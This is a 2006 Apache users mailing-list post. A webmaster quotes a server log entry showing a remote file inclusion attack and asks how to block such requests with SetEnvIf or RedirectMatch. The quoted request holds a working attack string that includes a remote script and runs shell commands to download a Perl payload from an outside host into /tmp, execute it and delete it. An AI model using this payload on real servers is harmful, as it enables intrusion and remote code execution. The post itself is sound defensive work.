Hello! Recently, i've founded some entries on my apache webserver log like this:[IP] - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*? HTTP/1.0" 200 220151 "-" "Mozilla/5.0"
As you can see, some attacker tries to use the index.php file to get a cmd.txt file from other site.
are there any way to detect this urls to stop this configuring apache? i've tried with setEnvIf and RedirectMatch on several ways, with no results: SetEnvIf Request_URI "(.*)cmd(.*)$" attack or RewriteEngine on RedirectMatch permanent (.*)cmd(.*)$ http://nourl only works with urls like: http://myserver/myfile.php/cmd not with http://myserver/myfile.php?cmdIt seems that te Request_URI and RedirectMatch doesn't works with the params on the URL, only with the main URL file.
Thanks. David --------------------------------------------------------------------- The official User-To-User support forum of the Apache HTTP Server Project. See <URL:http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx " from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
|